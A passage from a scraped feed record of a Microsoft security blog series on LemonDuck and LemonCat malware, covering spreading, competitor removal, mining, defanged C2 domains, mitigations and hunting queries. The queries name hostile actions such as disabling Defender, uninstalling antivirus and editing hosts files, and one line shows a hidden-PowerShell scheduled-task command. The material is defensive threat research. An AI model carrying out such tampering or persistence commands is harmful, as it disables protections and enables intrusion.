credential theft, _IF.Bin_ drops additional .BIN files to attempt common service exploits like CVE-2017-8464 (LNK remote code execution vulnerability) to increase privilege.\n\nThe attackers regularly update the internal infection components that the malware scans for. They then attempt brute force or spray attacks, as well as exploits against available SSH, MSSQL, SMB, Exchange, RDP, REDIS and Hadoop YARN for Linux and Windows systems. A sample of ports that recent LemonDuck infections were observed querying include 70001, 8088, 16379, 6379, 22, 445, and 1433.\n\nOther functions built in and updated in this lateral movement component include mail self-spreading. This spreading functionality evaluates whether a compromised device has Outlook. If so, it accesses the mailbox and scans for all available contacts. It sends the initiating infecting file as part of a .zip, .js, or .doc/.rtf file with a static set of subjects and bodies. The mail metadata count of contacts is also sent to the attacker, likely to evaluate its effectiveness, such as in the following command:\n\n![](https://www.microsoft.com/security/blog/uploads/securityprod/2021/07/code-4.png)\n\n## Competition removal and host patching\n\nAt installation and repeatedly afterward, LemonDuck takes great lengths to remove all other botnets, miners, and competitor malware from the device. It does this via _KR.Bin_, the \u201cKiller\u201d script, which gets its name from its function calls. This script attempts to remove services, network connections, and other evidence from dozens of competitor malware via scheduled tasks. It also closes well-known mining ports and removes popular mining services to preserve system resources. The script even removes the mining service it intends to use and simply reinstalls it afterward with its own configuration.\n\nThis \u201cKiller\u201d script is likely a continuation of older scripts that were used by other botnets such as GhostMiner in 2018 and 2019. The older variants of the script were quite small in comparison, but they have since grown, with additional services added in 2020 and 2021. Presently, LemonDuck seems consistent in naming its variant _KR.Bin_. This process spares the scheduled tasks created by LemonDuck itself, including various PowerShell scripts as well as a task called \u201cblackball\u201d, \u201cblutea\u201d, or \u201crtsa\u201d, which has been in use by all LemonDuck\u2019s infrastructures for the last year along with other task names.\n\nThe attackers were also observed manually re-entering an environment, especially in instances where edge vulnerabilities were used as an initial entry vector. The attackers also patch the vulnerability they used to enter the network to prevent other attackers from gaining entry. As mentioned, the attackers were seen using a copy of a Microsoft-provided mitigation tool for Exchange ProxyLogon vulnerability, which they hosted on their infrastructure, to ensure other attackers don\u2019t gain web shell access the way they had. If unmonitored, this scenario could potentially lead to a situation where, if a system does not appear to be in an unpatched state, suspicious activity that occurred before patching could be ignored or thought to be unrelated to the vulnerability.\n\n## Weaponization and continued impact\n\nA miner implant is downloaded as part of the monetization mechanism of LemonDuck. The implant used is usually XMRig, which is a favorite of GhostMiner malware, the [Phorpiex botnet](<https://www.microsoft.com/security/blog/2021/05/20/phorpiex-morphs-how-a-longstanding-botnet-persists-and-thrives-in-the-current-threat-environment/>), and other malware operators. The file uses any of the following names:\n\n * _M6.bin_\n * _M6.bin.ori_\n * _M6G.bin_\n * _M6.bin.exe_\n * _<File name that follows the regex pattern M[0-9]{1}[A-Z]{1}>.BIN._\n\nOnce the automated behaviors are complete, the threat goes into a consistent check-in behavior, simply mining and reporting out to the C2 infrastructure and mining pools as needed with encoded PowerShell commands such as those below (decoded):\n\n![](https://www.microsoft.com/security/blog/uploads/securityprod/2021/07/code-5.png)\n\nOther systems that are affected bring in secondary payloads such as Ramnit, which is a very popular Trojan that has been seen being dropped by other malware in the past. Additional backdoors, other malware implants, and activities continuing long after initial infection, demonstrating that even a \u201csimple\u201d infection by a coin mining malware like LemonDuck can persist and bring in more dangerous threats to the enterprise.\n\n## Comprehensive protection against a wide-ranging malware operation\n\nThe cross-domain visibility and coordinated defense delivered by [Microsoft 365 Defender](<https://www.microsoft.com/en-us/microsoft-365/security/microsoft-365-defender>) is designed for the wide range and increasing sophistication of threats that LemonDuck exemplifies. Below we list mitigation actions, detection information, and advanced hunting queries that Microsoft 365 Defender customers can use to harden networks against threats from LemonDuck and other malware operations.\n\n### Mitigations\n\nApply these mitigations to reduce the impact of LemonDuck. Check the recommendations card for the deployment status of monitored mitigations.\n\n * Prevent threats from arriving via removable storage devices by blocking these devices on sensitive endpoints. If you allow removable storage devices, you can minimize the risk by turning off autorun, enabling real-time antivirus protection, and blocking untrusted content. [Learn about stopping threats from USB devices and other removable media](<https://docs.microsoft.com/windows/security/threat-protection/device-control/control-usb-devices-using-intune>).\n * Ensure that Linux and Windows devices are included in routine patching, and validate protection against the CVE-2019-0708, CVE-2017-0144, CVE-2017-8464, CVE-2020-0796, CVE-2021-26855, CVE-2021-26858, and CVE-2021-27065 vulnerabilities, as well as against brute-force attacks in popular services like SMB, SSH, RDP, SQL, and others.\n * [Turn on PUA protection](<https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-antivirus/detect-block-potentially-unwanted-apps-windows-defender-antivirus>). Potentially unwanted applications (PUA) can negatively impact machine performance and employee productivity. In enterprise environments, PUA protection can stop adware, torrent downloaders, and coin miners.\n * Turn on [tamper protection features](<https://docs.microsoft.com/windows/security/threat-protection/microsoft-defender-antivirus/prevent-changes-to-security-settings-with-tamper-protection>)to prevent attackers from stopping security services.\n * Turn on [cloud-delivered protection](<https://docs.microsoft.com/windows/security/threat-protection/microsoft-defender-antivirus/enable-cloud-protection-microsoft-defender-antivirus>)and automatic sample submission on Microsoft Defender Antivirus. These capabilities use artificial intelligence and machine learning to quickly identify and stop new and unknown threats.\n * Encourage users to use Microsoft Edge and other web browsers that support SmartScreen, which identifies and blocks malicious websites, including phishing sites, scam sites, and sites that contain exploits and host malware. [Turn on network protection](<https://docs.microsoft.com/windows/security/threat-protection/microsoft-defender-atp/enable-network-protection>)to block connections to malicious domains and IP addresses.\n * Check your [Office 365 antispam policy](<https://docs.microsoft.com/microsoft-365/security/office-365-security/configure-your-spam-filter-policies>)and your [mail flow rules](<https://docs.microsoft.com/microsoft-365/security/office-365-security/create-safe-sender-lists-in-office-365#recommended-use-mail-flow-rules>) for allowed senders, domains and IP addresses. [Apply extra caution](<https://docs.microsoft.com/exchange/troubleshoot/antispam/cautions-against-bypassing-spam-filters>) when using these settings to bypass antispam filters, even if the allowed sender addresses are associated with trusted organizations\u2014Office 365 will honor these settings and can let potentially harmful messages pass through. [Review system overrides in threat explorer](<https://docs.microsoft.com/microsoft-365/security/office-365-security/threat-explorer#system-overrides>) to determine why attack messages have reached recipient mailboxes.\n\n### Attack surface reduction\n\nTurn on the following attack surface reduction rules, to block or audit activity associated with this threat:\n\n * [Block executable content from email client and webmail](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-executable-content-from-email-client-and-webmail>)\n * [Block JavaScript or VBScript from launching downloaded executable content](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-javascript-or-vbscript-from-launching-downloaded-executable-content>)\n * [Block Office applications from creating executable content](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-office-applications-from-creating-executable-content>)\n * [Block all office applications from creating child processes](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-all-office-applications-from-creating-child-processes>)\n * [Block executable files from running unless they meet a prevalence, age, or trusted list criterion](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-executable-files-from-running-unless-they-meet-a-prevalence-age-or-trusted-list-criterion>)\n * [Block execution of potentially obfuscated scripts](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-execution-of-potentially-obfuscated-scripts>)\n * [Block persistence through WMI event subscription](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-persistence-through-wmi-event-subscription>)\n * [Block process creations originating from PSExec and WMI commands](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-process-creations-originating-from-psexec-and-wmi-commands>)\n\n### Antivirus detections\n\nMicrosoft Defender Antivirus detects threat components as the following malware:\n\n * TrojanDownloader:PowerShell/LemonDuck!MSR\n * TrojanDownloader:Linux/LemonDuck.G!MSR\n * Trojan:Win32/LemonDuck.A\n * Trojan:PowerShell/LemonDuck.A\n * Trojan:PowerShell/LemonDuck.B\n * Trojan:PowerShell/LemonDuck.C\n * Trojan:PowerShell/LemonDuck.D\n * Trojan:PowerShell/LemonDuck.E\n * Trojan:PowerShell/LemonDuck.F\n * Trojan:PowerShell/LemonDuck.G\n * TrojanDownloader:PowerShell/LodPey.A\n * TrojanDownloader:PowerShell/LodPey.B\n * Trojan:PowerShell/Amynex.A\n * Trojan:Win32/Amynex.A\n\n### Endpoint detection and response (EDR) alerts\n\nAlerts with the following titles in the security center can indicate threat activity on your network:\n\n * LemonDuck botnet C2 domain activity\n * LemonDuck malware\n\nThe following alerts might also indicate threat activity associated with this threat. These alerts, however, can be triggered by unrelated threat activity and are not monitored in the status cards provided with this report.\n\n * Suspicious PowerShell command line\n * Suspicious remote activity\n * Suspicious service registration\n * Suspicious Security Software Discovery\n * Suspicious System Network Configuration Discovery\n * Suspicious sequence of exploration activities\n * Suspicious Process Discovery\n * Suspicious System Owner/User Discovery\n * Suspicious System Network Connections Discovery\n * Suspicious Task Scheduler activity\n * Suspicious Microsoft Defender Antivirus exclusion\n * Suspicious behavior by cmd.exe was observed\n * Suspicious remote PowerShell execution\n * Suspicious behavior by svchost.exe was observed\n * A WMI event filter was bound to a suspicious event consumer\n * Attempt to hide use of dual-purpose tool\n * System executable renamed and launched\n * Microsoft Defender Antivirus protection turned off\n * Anomaly detected in ASEP registry\n * A script with suspicious content was observed\n * An obfuscated command line sequence was identified\n * A process was injected with potentially malicious code\n * A malicious PowerShell Cmdlet was invoked on the machine\n * Suspected credential theft activity\n * Outbound connection to non-standard port\n * Sensitive credential memory read\n\n### Advanced hunting\n\nThe LemonDuck botnet is highly varied in its payloads and delivery methods after email distribution so can sometimes evade alerts. You can use the advanced hunting capability in Microsoft 365 Defender and Microsoft Defender for Endpoint to surface activities associated with this threat.\n\n**NOTE:** The following sample queries lets you search for a week's worth of events. To explore up to 30 days worth of raw data to inspect events in your network and locate potential Lemon Duck-related indicators for more than a week, go to the **Advanced Hunting** page > **Query** tab, select the calendar drop-down menu to update your query to hunt for the **Last 30 days**.\n\n**LemonDuck template subject lines**\n\nLooks for subject lines that are present from 2020 to 2021 in dropped scripts that attach malicious LemonDuck samples to emails and mail it to contacts of the mailboxes on impacted machines. Additionally, checks if Attachments are present in the mailbox. General attachment types to check for at present are .DOC, .ZIP or .JS, though this could be subject to change as well as the subjects themselves. [Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAG2RQUvDQBCF31nwP-ytCnroUUElxEoEUUirxWOiXRuNicSkpeCP99vJepESZnYz8-a9mdmZPlWoUq2ZNlqpUa9vHepAP3Laak2sw5zmGlTqnfsLGEdNgz_SRAtDOc4OTM-fUyuPT_WgJ93qWqea6gzsCfY_6mBKqdiYypcpVHRVRxVPzmmpjLqRIVOiO_Qy4gk8gW1ONtezzo0_x-7JOcvleiQfasNkE7gWuolcS_otbKI-zuHRH_QR82-ot3olXmpHfox6asJetlhtndbcer6wrxFTcmvhWdmmvG35rz7srGLTLvodyAF82FyHWmC5Ane89y0SUyroc837ja-WGkNjk1zqAj_VLyyp2szeAQAA&runQuery=true&timeRangeId=week>)\n\n`EmailEvents \n| where Subject in ('The Truth of COVID-19','COVID-19 nCov Special info WHO','HALTH ADVISORY:CORONA VIRUS', \n'WTF','What the fcuk','good bye','farewell letter','broken file','This is your order?') \n| where AttachmentCount >= 1`\n\n**LemonDuck Botnet Registration Functions**\n\nLooks for instances of function runs with name \u201cSIEX\u201d, which within the Lemon Duck initializing scripts is used to assign a specific user-agent for reporting back to command-and-control infrastructure with. This query should be accompanied by additional surrounding logs showing successful downloads from component sites. [Run query in Microsfot 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAG2PuwrCQBRETy34D4ufIViID7ATYmFhE9yAAV9oMIgm3-7ZLQRBhvtgmJm7O6fiQc3euXCrONNwZ8iAN4GWg9zNCkxVNWovajY8uWZ2IgIj1vJt1hbZcxQzuZModUQ1_1OjqL_Jpb6le0qIviRd6O3pxoud_Tc1MePcC1b-YZv3zvoA7T5fgtwAAAA&runQuery=true&timeRangeId=week>)\n\n`DeviceEvents \n| where ActionType == \"PowerShellCommand\" \n| where AdditionalFields =~ \"{\\\"Command\\\":\\\"SIEX\\\"}\"`\n\n**LemonDuck keyword identification**\n\nLooks for simple usage of LemonDuck seen keyword variations initiated by PowerShell processes. All results should reflect Lemon_Duck behavior, however there are existing variants of Lemon_Duck that might not use this term explicitly, so validate with additional hunting queries based on known TTPs. [Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAJ2NQQrCMBBF_1rwDqErBfEGrqyCUKQ3kKLFBpsojdoKHt7nbESX8pnM8P7MT65ad3nt6aU6nW1KaAWvFXVlHmukp5x6NbCOctrgeVyvyt6o40_CGtoyb9kIdrNATpkubPWWlCyxRXP6QGV__rZkDqjCO6iwnfdlA0naGX9oQn4BD2xHaK4bCSfo7Mv58Klezaq6iiQBAAA&runQuery=true&timeRangeId=week>)\n\n`DeviceProcessEvents \n| where InitiatingProcessFileName == \"powershell.exe\" \n| where InitiatingProcessCommandLine has_any(\"Lemon_Duck\",\"LemonDuck\")`\n\n**LemonDuck Microsoft Defender tampering**\n\nLooks for a command line event where LemonDuck or other like malware might attempt to modify Defender by disabling real-time monitoring functionality or adding entire drive letters to the exclusion criteria. The exclusion additions will often succeed even if tamper protection is enabled due to the design of the application. Custom alerts could be created in an environment for particular drive letters common in the environment. [Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAKWRzQqCQBSFzzroHcRVgT1EpIugIKp9mFoappL9LXr4vhkNrJUQl5m53jPnnOsdX4nuyhRxrnRRabOaCKgnKnQldzTUQC_Oh1KqF5ajOWgGnim0e6Hjj8aM_EyEYLEW9o5hplRq7dhzwtFIrjYgV020VGVVEh1ap8LqufK46cpHpYa5h5lozTIqxv9MvsSx6aqE2_T0YU7pIe7hEOjJd64bPpnV-_4rV-PORCqLncAiXJ1eE_D-mJ7h-p1Xm4OZ2radQI1aSFbpDTwRAUzcAQAA&runQuery=true&timeRangeId=week>)\n\n`DeviceProcessEvents \n| where InitiatingProcessCommandLine has_all (\"Set-MpPreference\", \"DisableRealtimeMonitoring\", \"Add-MpPreference\", \"ExclusionProcess\") \n| project ProcessCommandLine, InitiatingProcessCommandLine, DeviceId, Timestamp`\n\n**Antivirus uninstallation attempts**\n\nLooks for a command line event where LemonDuck or other similar malware might attempt to modify Defender by disabling real-time monitoring functionality or adding entire drive letters to the exclusion criteria. The exclusion additions will often succeed even if tamper protection is enabled due to the design of the application. Custom alerts could be created in an environment for particular drive letters common in the environment. [Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEALWQzUrEQBCE6yz4DiEnF0SfwIP4A6IsguBVQja4wyaTMBN_FsRn97M2u6LeBBl6plPdVV2dczV6VlDNe6uk3lnmXIA3ihrJ97WnNxV60RIsEYWuqAWqQZXvqMcfCpegLfmcjs6cE71zl-h0nnkE-kqUf5xwRt5xKmoL3bjnk7kEyXrgbjkH6A_mLfQEd_w2p9QhEXceW1RWO7yeNAqY0foZ_gbbdByD9a6MVqw8IfjvlZr922ZRa292bWSwdrbz9eSswkNlv1_fw5Rn-mp2SvaxZTTGt_2n3inonkj05gmf4y1R6akXuvulNNMH1HgRaFYCAAA&runQuery=true&timeRangeId=week>)\n\n`DeviceProcessEvents \n| where InitiatingProcessFileName =~ \"wmic.exe\" \n| where InitiatingProcessCommandLine has_all(\"product where\",\"name like\",\"call uninstall\",\"/nointeractive\") \n| where InitiatingProcessCommandLine has_any(\"Kaspersky\",\"avast\",\"avp\",\"security\",\"eset\",\"AntiVirus\",\"Norton Security\")`\n\n**Known LemonDuck component script installations**\n\nLooks for instances of the callback actions which attempt to obfuscate detection while downloading supporting scripts such as those that enable the \u201cKiller\u201d and \u201cInfection\u201d functions for the malware as well as the mining components and potential secondary functions. Options for more specific instances included to account for environments with potential false positives. Most general versions are intended to account for minor script or component changes such as changing to utilize non .bin files, and non-common components. [Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAN2QzWrCUBCFz1roO1xctSC60p2rVlEQ8Q0kJrYJJlGS-Ac-vN8dA9rgwm3LMHcm58zPmXxprYMShcSFCm0tK7ER-Fq5KvI3tXSR01ExWIE7TeES2ESBvbl-GhPGoCn5nIrMenyV07va2lF3tFmlzUyxLvGEt9XBQ3qiB-zjqYpXdHySZ1gAF2lmNb43Bim15PXbvaoePQ4uhNuSVcw513oiU5xTvwdNNaxxr7LfqEmJAV-RaQpq9qZjR3_Fjoltj-0yB1Pw-gv__j2e62pluu7X_Z_bNsy83-eRRN8NJNPg1z-4At8RQUloAwAA&runQuery=true&timeRangeId=week>)\n\n`DeviceProcessEvents \n| where InitiatingProcessFileName in (\"powershell.exe\",\"cmd.exe\") \n| where InitiatingProcessCommandLine has_all(\"/c echo try\",\"down_url=\",\"md5\",\"downloaddata\",\"ComputeHash\") or \nInitiatingProcessCommandLine has_all(\"/c echo try\",\"down_url=\",\"md5\",\"downloaddata\",\"ComputeHash\",\".bin\") or \nInitiatingProcessCommandLine has_all(\"/c echo try\",\"down_url=\",\"md5\",\"downloaddata\",\"ComputeHash\",\"kr.bin\",\"if.bin\",\"m6.bin\")`\n\n**LemonDuck named scheduled creation**\n\nLooks for instances of the LemonDuck creates statically named scheduled tasks or a semi-unique pattern of task creation LemonDuck also utilizes launching hidden PowerShell processes in conjunction with randomly generated task names. An example of a randomly generated one is: "schtasks.exe" /create /ru system /sc MINUTE /mo 60 /tn fs5yDs9ArkV\\2IVLzNXfZV/F /tr "powershell -w hidden -c PS_CMD". [Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAKWS0WrCQBBF77PgPyx5UrD6BX3S-mRLwQ8o2ygoGpXdtGlB_PaenSQlFV-kLLO53Jmde3eyM631qa1yvq8KOhqKrCf4tQ4qwX31dJZTpQ1cIJzmnNqDXuRVGPOoC3tGfU5dCR-1I8Zkv4jsZp-_qlNwwfIor7RA42BVG-s2oMeE2nTSo5B6Dv_d9c3476Z7CXZ6526e8zuQB-_Jja7yH-bAX2WCTcybM4duYE8O73WUNG_dt9YKqNc44jxarvjNpj_Q4gKlrsMWzztsaPCJ2spmGG2WyYPTA1xytsXpyt5E4nKb8hKvUz1rZvf9AWK9PVhOAgAA&runQuery=true&timeRangeId=week>)\n\n`DeviceProcessEvents \n| where FileName =~ \"schtasks.exe\" \n| where ProcessCommandLine has(\"/create\") \n| where ProcessCommandLine has_any(\"/tn blackball\",\"/tn blutea\",\"/tn rtsa\") or \nProcessCommandLine has_all(\"/create\",\"/ru\",\"system\",\"/sc\",\"/mo\",\"/tn\",\"/F\",\"/tr\",\"powershell -w hidden -c PS_CMD\")`\n\n**Competition killer script scheduled task execution**\n\nLooks for instances of the LemonDuck component KR.Bin, which is intended to kill competition prior to making the installation and persistence of the malware concrete. The killer script used is based off historical versions from 2018 and earlier, which has grown over time to include scheduled task and service names of various botnets, malware, and other competing services. The version currently in use by LemonDuck has approximately 40-60 scheduled task names. The upper maximum in this query can be modified and adjusted to include time bounding. [Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAJWRT0_CQBDF35nE79D0BAkRDhw4oBeqCQbUxD_XBguxhlpMW8EaP7y_HQppiATMZmZnZt_MvLwNNNdKb4q475VpaVHOuaI-V6qC-EwN_cjTWjG1DPP20EPid86UjpnGTEwNFVPJFeITTlM-WUS1sPoCOwf3hflqYx0FxAlW1GqPut3F1_jWjlGuz2pvxs5v2-myBVHIq5vTPIlri84XlfigpskIxHaX41mYJrMKteX5zMTEmLj9F5jjk-FLWCTW8woyhsuGU3gip7-U_8-E-g-ksHE_MOHOyTeKPtDnuJZVfme8I2Pt6YZ4hXl60gdzp7V_WaKyf4DjYXUuTZ-euqbSMS0Hhu6D_gUG3Q8GqgIAAA&runQuery=true&timeRangeId=week>)\n\n`DeviceProcessEvents \n| where ProcessCommandLine has_all(\"schtasks.exe\",\"/Delete\",\"/TN\",\"/F\") \n| summarize make_set(ProcessCommandLine) by DeviceId \n| extend DeleteVolume = array_length(set_ProcessCommandLine) \n| where set_ProcessCommandLine has_any(\"Mysa\",\"Sorry\",\"Oracle Java Update\",\"ok\") where DeleteVolume >= 40 and DeleteVolume <= 80`\n\n**LemonDuck hosts file adjustment for dynamic C2 downloads**\n\nLooks for a PowerShell event wherein LemonDuck will attempt to simultaneously retrieve the IP address of a C2 and modify the hosts file with the retrieved address. The address is then attributed to a name that does not exist and is randomly generated. The script then instructs the machine to download data from the address. This query has a more general and more specific version, allowing the detection of this technique if other activity groups were to utilize it. [Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAMWQuwrCYAyFzyz4DqWTgvgGDmK9gYigu5S22IK20op18OH9Erro4OAiIZc_OTknbaRMdxVKyDvVqrxqsDn9TKVu1H319FSgVjm9Gg-0ZlYwLRR7LHX6YFjQPVNvQVx8Z4IFCnUF1TpT44xnbEx-4OGPajPqCxYzS7VxjG3mdBodiaYygH9J_6YV-IY8BZ26irFYDDXCDZN0dd5hbTaE0y6s2PnHXWv432cHNvZs1J3-9_vtHfn_L9Gt0E952_Wxf90Lt1_r6hICAAA&runQuery=true&timeRangeId=week>)\n\n`DeviceProcessEvents \n| where InitiatingProcessFileName == \"powershell.exe\" \n| where InitiatingProcessCommandLine has_all(\"GetHostAddresses\",\"etc\",\"hosts\") \nor InitiatingProcessCommandLine has_all(\"GetHostAddresses\",\"IPAddressToString\",\"etc\",\"hosts\",\"DownloadData\")`\n\n \n\n[Learn how your organization can stop attacks through automated, cross-domain security and built-in AI with Microsoft Defender 365](<https://www.microsoft.com/en-us/microsoft-365/security/microsoft-365-defender>).\n\n \n\nThe post [When coin miners evolve, Part 2: Hunting down LemonDuck and LemonCat attacks](<https://www.microsoft.com/security/blog/2021/07/29/when-coin-miners-evolve-part-2-hunting-down-lemonduck-and-lemoncat-attacks/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/security/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-07-29T19:00:59", "type": "mmpc", "title": "When coin miners evolve, Part 2: Hunting down LemonDuck and LemonCat attacks", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0144", "CVE-2017-8464", "CVE-2019-0708", "CVE-2020-0796", "CVE-2021-26855", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-07-29T19:00:59", "id": "MMPC:4A6B394DCAF12E05136AE087248E228C", "href": "https://www.microsoft.com/security/blog/2021/07/29/when-coin-miners-evolve-part-2-hunting-down-lemonduck-and-lemoncat-attacks/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-30T00:39:50", "description": "_[Note: In this two-part blog series, we expose a modern malware infrastructure and provide guidance for protecting against the wide range of threats it enables. Part 1 covers the evolution of the threat, how it spreads, and how it impacts organizations. [Part 2](<https://www.microsoft.com/security/blog/2021/07/29/when-coin-miners-evolve-part-2-hunting-down-lemonduck-and-lemoncat-attacks/>) is a deep dive on the attacker behavior and will provide investigation guidance.] _\n\nCombating and preventing today's threats to enterprises require comprehensive protection focused on addressing the full scope and impact of attacks. Anything that can gain access to machines\u2014even so-called commodity malware\u2014can bring in more dangerous threats. We\u2019ve seen this in banking Trojans serving as entry point for ransomware and hands-on-keyboard attacks. LemonDuck, an actively updated and robust malware that\u2019s primarily known for its botnet and cryptocurrency mining objectives, followed the same trajectory when it adopted more sophisticated behavior and escalated its operations. Today, beyond using resources for its traditional bot and mining activities, LemonDuck steals credentials, removes security controls, spreads via emails, moves laterally, and ultimately drops more tools for human-operated activity.\n\nLemonDuck\u2019s threat to enterprises is also in the fact that it\u2019s a cross-platform threat. It\u2019s one of a few documented bot malware families that targets Linux systems as well as Windows devices. It uses a wide range of spreading mechanisms\u2014phishing emails, exploits, USB devices, brute force, among others\u2014and it has shown that it can quickly take advantage of news, events, or the release of new exploits to run effective campaigns. For example, in 2020, it was observed using COVID-19-themed lures in email attacks. In 2021, it exploited newly patched [Exchange Server vulnerabilities](<https://www.microsoft.com/security/blog/2021/03/25/analyzing-attacks-taking-advantage-of-the-exchange-server-vulnerabilities/>) to gain access to outdated systems.\n\nThis threat, however, does not just limit itself to new or popular vulnerabilities. It continues to use older vulnerabilities, which benefit the attackers at times when focus shifts to patching a popular vulnerability rather than investigating compromise. Notably, LemonDuck removes other attackers from a compromised device by getting rid of competing malware and preventing any new infections by patching the same vulnerabilities it used to gain access.\n\nIn the early years, LemonDuck targeted China heavily, but its operations have since expanded to include many other countries, focusing on the manufacturing and IoT sectors. Today, LemonDuck impacts a very large geographic range, with the United States, Russia, China, Germany, the United Kingdom, India, Korea, Canada, France, and Vietnam seeing the most encounters.\n\n![World map showing geographic distribution of LemonDuck activity](https://www.microsoft.com/security/blog/uploads/securityprod/2021/07/lemon-duck-geographic-distribution.png)\n\n_Figure 1. Global distribution of LemonDuck botnet activity_\n\nIn 2021, LemonDuck campaigns started using more diversified command and control (C2) infrastructure and tools. This update supported the marked increase in hands-on-keyboard actions post-breach, which varied depending on the perceived value of compromised devices to the attackers. Despite all these upgrades, however, LemonDuck still utilizes C2s, functions, script structures, and variable names for far longer than the average malware. This is likely due to its use of bulletproof hosting providers such as Epik Holdings, which are unlikely to take any part of the LemonDuck infrastructure offline even when reported for malicious actions, allowing LemonDuck to persist and continue to be a threat.\n\nIn-depth research into malware infrastructures of various sizes and operations provides invaluable insight into the breadth of threats that organizations face today. In the case of LemonDuck, the threat is cross-platform, persistent, and constantly evolving. Research like this emphasizes the importance of having comprehensive visibility into the wide range of threats, as well as the ability to correlate simple, disparate activity such as coin mining to more dangerous adversarial attacks.\n\n## LemonDuck and LemonCat infrastructure\n\nThe earliest documentation of LemonDuck was from its cryptocurrency campaigns in May 2019. These campaigns included PowerShell scripts that employed additional scripts kicked off by a scheduled task. The task was used to bring in the PCASTLE tool to achieve a couple of goals: abuse the EternalBlue SMB exploit, as well as use brute force or pass-the-hash to move laterally and begin the operation again. Many of these behaviors are still observed in LemondDuck campaigns today.\n\nLemonDuck is named after the variable \u201cLemon_Duck\u201d in one of the said PowerShell scripts. The variable is often used as the user agent, in conjunction with assigned numbers, for infected devices. The format used two sets of alphabetical characters separated by dashes, for example: \u201cUser-Agent: Lemon-Duck-[A-Z]-[A-Z]\u201d. The term still appears in PowerShell scripts, as well as in many of the execution scripts, specifically in a function called SIEX, which is used to assign a unique user-agent during botnet connection in attacks as recently as June 2021.\n\nLemonDuck frequently utilizes open-source material built off of resources also used by other botnets, so there are many components of this threat that would seem familiar. Microsoft researchers are aware of two distinct operating structures, which both use the LemonDuck malware but are potentially operated by two different entities for separate goals.\n\nThe first, which we call the \u201cDuck\u201d infrastructure, uses historical infrastructures discussed in this report. It is highly consistent in running campaigns and performs limited follow-on activities. This infrastructure is seldom seen in conjunction with edge device compromise as an infection method, and is more likely to have random display names for its C2 sites, and is always observed utilizing \u201cLemon_Duck\u201d explicitly in script.\n\nThe second infrastructure, which we call \u201cCat\u201d infrastructure\u2014for primarily using two domains with the word \u201ccat\u201d in them (_sqlnetcat[.]com_, _netcatkit[.]com_)\u2014emerged in January 2021. It was used in attacks exploiting vulnerabilities in Microsoft Exchange Server. Today, the Cat infrastructure is used in attacks that typically result in backdoor installation, credential and data theft, and malware delivery. It is often seen delivering the malware Ramnit.\n\n \n\n**Sample Duck domains** | **Sample Cat domains** \n---|--- \n \n * cdnimages[.]xyz\n * bb3u9[.]com\n * zz3r0[.]com\n * pp6r1[.]com\n * amynx[.]com\n * ackng[.]com\n * hwqloan[.]com\n * js88[.]ag\n * zer9g[.]com\n * b69kq[.]com\n| \n\n * sqlnetcat[.]com\n * netcatkit[.]com\n * down[.]sqlnetcat[.]com\n\n \n \nThe Duck and Cat infrastructures use similar subdomains, and they use the same task names, such as \u201cblackball\u201d. Both infrastructures also utilize the same packaged components hosted on similar or identical sites for their mining, lateral movement, and competition-removal scripts, as well as many of the same function calls.\n\nThe fact that the Cat infrastructure is used for more dangerous campaigns does not deprioritize malware infections from the Duck infrastructure. Instead, this intelligence adds important context for understanding this threat: the same set of tools, access, and methods can be re-used at dynamic intervals, to greater impact. Despite common implications that cryptocurrency miners are less threatening than other malware, its core functionality mirrors non-monetized software, making any botnet infection worthy of prioritization.\n\n![Diagram showing attacker activity following infection of LemonDuck malware, highlight activities common to the LemonDuck and LemonCat infrastructure, and showing unique behavior for each](https://www.microsoft.com/security/blog/uploads/securityprod/2021/07/attack-chain.png)\n\n_Figure 2. LemonDuck attack chain from the Duck and Cat infrastructures_\n\n## Initial access\n\nLemonDuck spreads in a variety of ways, but the two main methods are (1) compromises that are 